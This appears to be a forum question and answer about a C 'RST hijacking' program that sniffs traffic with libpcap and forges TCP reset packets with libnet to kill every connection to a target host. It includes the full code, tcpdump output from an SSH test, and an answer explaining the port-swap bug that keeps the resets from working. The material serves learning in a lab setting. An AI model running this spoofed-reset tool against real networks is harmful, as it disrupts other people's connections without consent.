I am trying to do ‘rst hijacking’ by using a c script with libcap and libnet included. I use libcap to sniff all packets coming from and going to a host given as input to the program via the commandline. Then libnet sends rst packets to the host trying to connect to the specified host. However when I run the script and connect to the given host via ssh I can do this without the connection being reset. I am using Kali Linux 2019.4 64 bit version. This is the code:
#include <libnet.h>
#include <pcap.h>
#include "hacking.h"
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;
char errbuf[PCAP_ERRBUF_SIZE];
char *device;
u_long target_ip;
libnet_t *l; /* libnet context */
if (argc < 1) {
printf("Usage: %s <target IP>n", argv[0]);
exit(0);
}
target_ip = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
device = pcap_lookupdev(errbuf);
if (device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if (pcap_handle == NULL)
fatal(errbuf);
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if (l == NULL)
fatal(errbuf);
libnet_seed_prand(l);
set_packet_filter(pcap_handle, (struct in_addr*)&target_ip);
printf("Resetting all TCP connections to %s on %sn", argv[1], device);
pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&l);
pcap_close(pcap_handle);
libnet_destroy(l);
return 0;
}
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
struct bpf_program filter;
char filter_string[100];
sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", inet_ntoa(*target_ip));
printf("[DEBUG]: filter string is '%s'n", filter_string);
if (pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
fatal("pcap_compile failed");
if (pcap_setfilter(pcap_hdl, &filter) == -1)
fatal("pcap_setfilter failed");
}
void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
u_char *pkt_data;
struct libnet_tcp_hdr *TCPhdr;
struct libnet_ipv4_hdr *IPhdr;
struct data_pass *passed;
libnet_t **l_passed;
int bcount;
l_passed = (libnet_t **)user_args;
TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H);
IPhdr = (struct libnet_ipv4_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);
printf("Reseting TCP connection from %s:%d ", inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));
printf("<---> %s:%dn", inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));
if (libnet_build_tcp(htons(TCPhdr->th_dport),
htons(TCPhdr->th_sport),
htonl(TCPhdr->th_ack),
libnet_get_prand(LIBNET_PRu32),
TH_RST,
libnet_get_prand(LIBNET_PRu16),
0,
0,
LIBNET_TCP_H,
NULL,
0,
*l_passed,
0) == -1) {
fatal("in building tcp header");
}
if (libnet_build_ipv4(LIBNET_TCP_H+LIBNET_IPV4_H,
IPTOS_LOWDELAY,
libnet_get_prand(LIBNET_PRu16),
0,
libnet_get_prand(LIBNET_PR8),
IPPROTO_TCP,
0,
*((u_long *)&(IPhdr->ip_src)),
*((u_long *)&(IPhdr->ip_dst)),
NULL,
0,
*l_passed,
0) == -1) {
fatal("in building ip header");
}
bcount = libnet_write(*l_passed);
if (bcount < LIBNET_IPV4_H+LIBNET_TCP_H)
printf("Warning: incomplete package written. (%d of %d bytes)n", bcount, LIBNET_IPV4_H+LIBNET_TCP_H);
libnet_clear_packet(*l_passed);
usleep(5000);
}
When I run it like this I:
sudo ./rst_hijack 192.168.74.37
and meanwhile connect to 19.168.74.37 via ssh the output tells me that it is resetting the connection but I still can use the terminal in the ssh connection as usual. Now my question is what is causing the behavior of this program and how to fix it to properly reset the connection? Here is the output of running:
sudo tcpdump "dst host 192.168.74.37 || dst host 192.168.74.65" -i eth0 -nl
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
08:44:52.624717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [S], seq 4267262989, win 64240, options [mss 1460,sackOK,TS val 1038758058 ecr 0,nop,wscale 7], length 0
08:44:52.639135 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1138266852, win 502, options [nop,nop,TS val 1038758073 ecr 120128956], length 0
08:44:52.640092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 59375, length 0
08:44:52.640118 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 0:32, ack 1, win 502, options [nop,nop,TS val 1038758074 ecr 120128956], length 32
08:44:52.648338 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 19838, length 0
08:44:52.670975 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 44, win 502, options [nop,nop,TS val 1038758105 ecr 120128988], length 0
08:44:52.672025 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266895, win 18065, length 0
08:44:52.673352 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 32:1424, ack 44, win 502, options [nop,nop,TS val 1038758107 ecr 120128988], length 1392
08:44:52.676762 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1124, win 501, options [nop,nop,TS val 1038758110 ecr 120128993], length 0
08:44:52.680200 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266895, win 11726, length 0
08:44:52.685387 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138267975, win 19899, length 0
08:44:52.722855 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1424:1472, ack 1124, win 501, options [nop,nop,TS val 1038758156 ecr 120129039], length 48
08:44:52.728049 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138267975, win 11027, length 0
08:44:52.757195 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1576, win 501, options [nop,nop,TS val 1038758191 ecr 120129074], length 0
08:44:52.760160 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 63708, length 0
08:44:52.761581 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1472:1488, ack 1576, win 501, options [nop,nop,TS val 1038758195 ecr 120129074], length 16
08:44:52.768033 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 55326, length 0
08:44:52.812954 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1488:1532, ack 1576, win 501, options [nop,nop,TS val 1038758247 ecr 120129129], length 44
08:44:52.814950 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1620, win 501, options [nop,nop,TS val 1038758249 ecr 120129132], length 0
08:44:52.815093 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1532:1592, ack 1620, win 501, options [nop,nop,TS val 1038758249 ecr 120129132], length 60
08:44:52.816056 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268427, win 31111, length 0
08:44:52.821239 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268471, win 29341, length 0
08:44:52.824528 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1672, win 501, options [nop,nop,TS val 1038758258 ecr 120129140], length 0
08:44:52.826428 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268471, win 26394, length 0
08:44:52.832086 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268523, win 8500, length 0
08:44:57.864004 ARP, Request who-has 192.168.74.37 tell 192.168.74.69, length 28
08:44:59.170523 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1592:1676, ack 1672, win 501, options [nop,nop,TS val 1038764604 ecr 120129140], length 84
08:44:59.176106 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268523, win 57729, length 0
08:44:59.275774 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 1700, win 501, options [nop,nop,TS val 1038764709 ecr 120135590], length 0
08:44:59.276091 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1676:1788, ack 1700, win 501, options [nop,nop,TS val 1038764710 ecr 120135590], length 112
08:44:59.280071 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268551, win 15752, length 0
08:44:59.285284 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138268551, win 57521, length 0
08:44:59.808013 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2200, win 501, options [nop,nop,TS val 1038765242 ecr 120136080], length 0
08:44:59.809815 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2244, win 501, options [nop,nop,TS val 1038765243 ecr 120136126], length 0
08:44:59.810123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 1788:2240, ack 2244, win 501, options [nop,nop,TS val 1038765244 ecr 120136126], length 452
08:44:59.816095 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269051, win 40356, length 0
08:44:59.821297 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269095, win 16013, length 0
08:44:59.826499 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269095, win 44708, length 0
08:44:59.826731 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2352, win 501, options [nop,nop,TS val 1038765260 ecr 120136140], length 0
08:44:59.826807 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2468, win 501, options [nop,nop,TS val 1038765260 ecr 120136141], length 0
08:44:59.826975 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2856, win 501, options [nop,nop,TS val 1038765261 ecr 120136141], length 0
08:44:59.832084 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269203, win 21728, length 0
08:44:59.837289 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269319, win 57265, length 0
08:44:59.842548 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269707, win 20477, length 0
08:45:00.107292 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 2964, win 501, options [nop,nop,TS val 1038765541 ecr 120136422], length 0
08:45:00.112102 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269815, win 45488, length 0
08:45:00.980228 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2240:2276, ack 2964, win 501, options [nop,nop,TS val 1038766414 ecr 120136422], length 36
08:45:00.982783 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3000, win 501, options [nop,nop,TS val 1038766416 ecr 120137299], length 0
08:45:00.984104 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269815, win 22888, length 0
08:45:00.989328 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269851, win 3332, length 0
08:45:01.060943 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2276:2312, ack 3000, win 501, options [nop,nop,TS val 1038766495 ecr 120137299], length 36
08:45:01.064097 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269851, win 31536, length 0
08:45:01.070127 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3036, win 501, options [nop,nop,TS val 1038766504 ecr 120137387], length 0
08:45:01.072099 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269887, win 58974, length 0
08:45:01.174452 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2312:2348, ack 3036, win 501, options [nop,nop,TS val 1038766608 ecr 120137387], length 36
08:45:01.176088 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269887, win 10923, length 0
08:45:01.176423 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3072, win 501, options [nop,nop,TS val 1038766610 ecr 120137493], length 0
08:45:01.184092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269923, win 36096, length 0
08:45:01.219113 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2348:2384, ack 3072, win 501, options [nop,nop,TS val 1038766653 ecr 120137493], length 36
08:45:01.223478 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3108, win 501, options [nop,nop,TS val 1038766657 ecr 120137539], length 0
08:45:01.224013 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269923, win 53739, length 0
08:45:01.229150 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269959, win 44679, length 0
08:45:01.453120 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2384:2420, ack 3108, win 501, options [nop,nop,TS val 1038766887 ecr 120137539], length 36
08:45:01.456107 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269959, win 17777, length 0
08:45:01.456393 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3144, win 501, options [nop,nop,TS val 1038766890 ecr 120137772], length 0
08:45:01.464089 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269995, win 9542, length 0
08:45:01.775818 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2420:2456, ack 3144, win 501, options [nop,nop,TS val 1038767209 ecr 120137772], length 36
08:45:01.776102 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138269995, win 31138, length 0
08:45:01.777681 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3180, win 501, options [nop,nop,TS val 1038767211 ecr 120138094], length 0
08:45:01.784090 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270031, win 473, length 0
08:45:01.807123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2456:2492, ack 3180, win 501, options [nop,nop,TS val 1038767241 ecr 120138094], length 36
08:45:01.808007 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270031, win 62491, length 0
08:45:01.809600 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3216, win 501, options [nop,nop,TS val 1038767243 ecr 120138126], length 0
08:45:01.816235 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270067, win 58091, length 0
08:45:01.929904 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2492:2528, ack 3216, win 501, options [nop,nop,TS val 1038767364 ecr 120138126], length 36
08:45:01.931774 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3252, win 501, options [nop,nop,TS val 1038767365 ecr 120138248], length 0
08:45:01.936106 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270067, win 7117, length 0
08:45:01.939199 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2528:2564, ack 3252, win 501, options [nop,nop,TS val 1038767373 ecr 120138248], length 36
08:45:01.941365 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270103, win 63243, length 0
08:45:01.941455 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3288, win 501, options [nop,nop,TS val 1038767375 ecr 120138258], length 0
08:45:01.946686 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270103, win 12199, length 0
08:45:01.951897 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270139, win 56953, length 0
08:45:02.079717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2564:2600, ack 3288, win 501, options [nop,nop,TS val 1038767513 ecr 120138258], length 36
08:45:02.080174 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270139, win 51134, length 0
08:45:02.081735 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3324, win 501, options [nop,nop,TS val 1038767515 ecr 120138398], length 0
08:45:02.088089 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270175, win 51600, length 0
08:45:02.217181 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2600:2636, ack 3324, win 501, options [nop,nop,TS val 1038767651 ecr 120138398], length 36
08:45:02.219087 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3360, win 501, options [nop,nop,TS val 1038767653 ecr 120138536], length 0
08:45:02.224100 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270175, win 8177, length 0
08:45:02.229315 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270211, win 12145, length 0
08:45:02.261653 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2636:2672, ack 3360, win 501, options [nop,nop,TS val 1038767695 ecr 120138536], length 36
08:45:02.263689 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3396, win 501, options [nop,nop,TS val 1038767697 ecr 120138580], length 0
08:45:02.263998 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270211, win 25986, length 0
08:45:02.269112 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270247, win 48796, length 0
08:45:02.270102 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2672:2708, ack 3396, win 501, options [nop,nop,TS val 1038767704 ecr 120138580], length 36
08:45:02.274243 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3432, win 501, options [nop,nop,TS val 1038767708 ecr 120138591], length 0
08:45:02.274263 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270247, win 47387, length 0
08:45:02.280269 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270283, win 54522, length 0
08:45:02.432123 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2708:2744, ack 3432, win 501, options [nop,nop,TS val 1038767866 ecr 120138591], length 36
08:45:02.435146 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3468, win 501, options [nop,nop,TS val 1038767869 ecr 120138751], length 0
08:45:02.440109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270283, win 30791, length 0
08:45:02.445333 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 31531, length 0
08:45:02.649095 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2744:2780, ack 3468, win 501, options [nop,nop,TS val 1038768083 ecr 120138751], length 36
08:45:02.656101 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 35180, length 0
08:45:02.669801 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2780:2816, ack 3468, win 501, options [nop,nop,TS val 1038768103 ecr 120138751], length 36
08:45:02.672049 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 56114, length 0
08:45:02.676520 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3468, win 501, options [nop,nop,TS val 1038768110 ecr 120138751,nop,nop,sack 1 {3504:3540}], length 0
08:45:02.680109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270319, win 50643, length 0
08:45:02.902946 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3540, win 501, options [nop,nop,TS val 1038768337 ecr 120139219], length 0
08:45:02.904054 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270391, win 33161, length 0
08:45:03.261163 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2816:2852, ack 3540, win 501, options [nop,nop,TS val 1038768695 ecr 120139219], length 36
08:45:03.264017 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270391, win 24146, length 0
08:45:03.264404 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3576, win 501, options [nop,nop,TS val 1038768698 ecr 120139581], length 0
08:45:03.269455 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3660, win 501, options [nop,nop,TS val 1038768703 ecr 120139585], length 0
08:45:03.270931 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3768, win 501, options [nop,nop,TS val 1038768705 ecr 120139588], length 0
08:45:03.272009 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270427, win 61053, length 0
08:45:03.277137 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270511, win 27067, length 0
08:45:03.282302 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270619, win 37574, length 0
08:45:03.748917 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2852:2888, ack 3768, win 501, options [nop,nop,TS val 1038769183 ecr 120139588], length 36
08:45:03.751160 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3804, win 501, options [nop,nop,TS val 1038769185 ecr 120140068], length 0
08:45:03.752077 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270619, win 58993, length 0
08:45:03.757298 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 62372, length 0
08:45:03.919971 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2888:2924, ack 3804, win 501, options [nop,nop,TS val 1038769354 ecr 120140068], length 36
08:45:03.928109 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 29405, length 0
08:45:04.132019 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [P.], seq 2888:2924, ack 3804, win 501, options [nop,nop,TS val 1038769566 ecr 120140068], length 36
08:45:04.136107 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270655, win 54770, length 0
08:45:04.362957 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [.], ack 3840, win 501, options [nop,nop,TS val 1038769797 ecr 120140679], length 0
08:45:04.368104 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138270691, win 26246, length 0
Advertisement
Answer
The port numbers of the rst-packets are the wrong.
This line
08:44:52.624717 IP 192.168.74.69.35340 > 192.168.74.37.22: Flags [S], seq 4267262989, win 64240, options [mss 1460,sackOK,TS val 1038758058 ecr 0,nop,wscale 7], length 0
shows, that the connection is established from 192.168.74.69 port 35340 to the ssh server running on 192.168.74.37 port 22
but this rst packet
08:44:52.640092 IP 192.168.74.69.22 > 192.168.74.37.35340: Flags [R], seq 1138266852, win 59375, length 0
resets a connection from host 192.168.74.69 port 22, to host 192.168.74.37 port 35340
You have to swap the port numbers (or the ip numbers, depending on if you send the packet to the server or to the client) in the rst packet.